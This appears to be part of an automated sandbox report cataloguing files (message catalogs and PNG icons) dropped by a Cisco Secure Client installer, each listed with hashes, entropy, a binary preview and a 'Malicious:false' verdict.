                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312693
                                                                                                                                                                                                  Entropy (8bit):6.237794032422467
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                                                                                  SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                                                                                  SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                                                                                  SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313019
                                                                                                                                                                                                  Entropy (8bit):6.234654802477353
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                                                                                  MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                                                                                  SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                                                                                  SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                                                                                  SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313019
                                                                                                                                                                                                  Entropy (8bit):6.234654802477353
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                                                                                  MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                                                                                  SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                                                                                  SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                                                                                  SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313017
                                                                                                                                                                                                  Entropy (8bit):6.23496399047262
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                                                                                  MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                                                                                  SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                                                                                  SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                                                                                  SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313017
                                                                                                                                                                                                  Entropy (8bit):6.23496399047262
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                                                                                  MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                                                                                  SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                                                                                  SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                                                                                  SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3882
                                                                                                                                                                                                  Entropy (8bit):6.743390042757195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                                                                                  MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                                                                                  SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                                                                                  SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                                                                                  SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3884
                                                                                                                                                                                                  Entropy (8bit):6.749338244156901
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                                                                                  MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                                                                                  SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                                                                                  SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                                                                                  SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3880
                                                                                                                                                                                                  Entropy (8bit):6.742220289284142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                                                                                  MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                                                                                  SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                                                                                  SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                                                                                  SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3881
                                                                                                                                                                                                  Entropy (8bit):6.749191813135782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                                                                                  MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                                                                                  SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                                                                                  SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                                                                                  SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):431993
                                                                                                                                                                                                  Entropy (8bit):4.565786626694248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                                                                                  MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                                                                                  SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                                                                                  SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                                                                                  SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:............ ............... ............... .^N............ .(R............ .(...!S..``.... .....I[..@@.... .(B......00.... ..%...2..((.... .h....W.. .... .....)r........ .............. .....Y......... .h........PNG........IHDR.....................pHYs..........o.d.. .IDATx...wtUU....MO..B....TA.. ...l....Ti"H.E...D@lT.EA.).... ........R...{o...Jd..o.L...},.RJ9.1.......#W..` (.#.._.....?>|..ki@j.G..........q..........2>....( ......RJ)u.,..J).2..a@^ <....C..?;..}9..f..p....|..#,.J...Rn.]..(.T.3.x....@..|.D..vu.N....W.|D.....y..(..5.c, ..^..!}.....Np...eY)B.R...PJy<cL(P9."._.............^...W....RJ)G..@).1.1.@9...U2>*..UGy.(2......,..M..R6..@).1..r._....dH.S.WC.Ws.eYi...R*+h...ri..?.j.........[..vsyc.eY...R..i...r).....wd|.B..+.....M.F`.eY.e#)....@).h.R..._..=...K9.q....>v..".....Q..cdl.....w.~Q.R.$.......t.R.I..PJ...<.C.}..&....M...h..(.l.1.....J..!...2>.Y.uA8.R...^.T.2...........H).I...V..,..!.G)...PJe..}....S.....r9'.....e....r3..(.n.1.8......M
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1807
                                                                                                                                                                                                  Entropy (8bit):7.846793911413473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                                                                                  MD5:536C911881523B9F8402A481881992A0
                                                                                                                                                                                                  SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                                                                                  SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                                                                                  SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..;R#I..k.........1...h.@'..:.V...1'.q..kM...Ly..h..6J.=....Y.%E~...!..wVe... .. .. .. ....O;....I..UO...........R.........7...E)5W.d...Q.)J5.7\{....Q.W.P.R.a.@.*K......ab...Q.d..zV....^..m.C.t..U.Y.e..(.....x.J)...s.....)..XM....Y.._~Q......o#..........=.p+b.E..X..X.}.'..o...DJw..GJq.].^.%R.#..3.y<.s...5.......s.s....;>.Z.q.F./..r.Z...T..=.&H......z...~J/.%.....(.~.|R7...z.LV....+.........T....|L.1i<..Zc.]LO.;.@.:.?IU./..A.,.-.rGr!Z...'I.........6+^......a....n6~e6ejy.f.........\UC..\..i..s.r.U_.i..>......u...p...zb5..t|u.h.*gxD..}6T[i.jxO./..goc...9......(.[..........*.{.8.f.(..R..J8.za.;.t..aj./.5.^px....g[...]z...=.Q.Q.%.D...z2`.;.6.K9.26Tc'....)_...$..<.&.7v.....pQ..N....s.c...XX..x.>..O.....)&/IYm..=....7.A.......c$..R....T{.q......C..@.L.....]({..>y.:.e.#....ym.....g^.R.....v.$.M.B.E....^.xSF80......n|Ph./..%<.I...X.f..=.pz..~...a..O1.9g.m.Mp....n.v%D....w....F6.....{.".!.~.}..}.P.S.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388
                                                                                                                                                                                                  Entropy (8bit):7.139959170245274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                                                                                  MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                                                                                  SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                                                                                  SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                                                                                  SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....6IDATH...M.0.E.L....&hG..t...f.........F`.l..}n.....B..).....}.p.k....x..3n|oI.^..G._~%..3...7~.^...#D..]/.lD.....{...#..:...k..+n.U.....)".]'g...9Y...G.w^v.&.FX{....".i.k.:..bN.......b.(H......8.y. .E...s$.V.....U.sOwFo.#...a;:....2.....=.....P...ct.k.A..-....Q...<..R...$.FX.-M......k.W...b.}2o.....p.........IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1916
                                                                                                                                                                                                  Entropy (8bit):7.856747119568193
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                                                                                  MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                                                                                  SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                                                                                  SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                                                                                  SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]=r[7.....eJ.Kg.M#..~>...H.. ..8.O .L.....T.......p.&.....P.7.G....a..X,...........m..}7:...9...o.u.7.9.,....3...>.x...^R...........y...F.."eC....dzk...5.T.).hHD.US)L.`..x^..eIA2~...`..W.g%.T..ndT.u.d..r.[r.6.6PM.=...|....<..9..j.$'...GJ7.J...s..........<..3...Ip.C..'.....9.....G.H..C.'..n.._&i.!-)....v......'M..p..=M........=..4R...7.$b.;.iH..9.Q.....]P.%.OBL|R.............j.T....Lc.:.):B....f5P.]+..c.>.....!.Tz8.P.N.#..@nw0.H....$.:{...K.. .%......xG...3...OA..,.9..u.b.....<....v.H./.....k~.o...8.%.'.....w.'.'.%....!t.{........).oL...y?_~...K....>j.....]3.%...$.Cr@....l+.`...Y..._0v.4.s...@3._...]{n..)...wRpO....%.w..h2.....v...p/.}..#j.@.d.t.F.HA)..`).r<.....'...cq..WI..>...qy.......h........MJ..B(W. @....\1.SK...pz.kL......2{"hF...H..'.m"........K..2...).3a.....5.NR.an.\}.t6..is0T.&....2...6..H..U_6..E....$g...S..Nm..d+qp/dI......r.b....>....q/.8Qm..I.......%.P......I...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):421
                                                                                                                                                                                                  Entropy (8bit):7.268682924293009
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                                                                                  MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                                                                                  SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                                                                                  SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                                                                                  SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
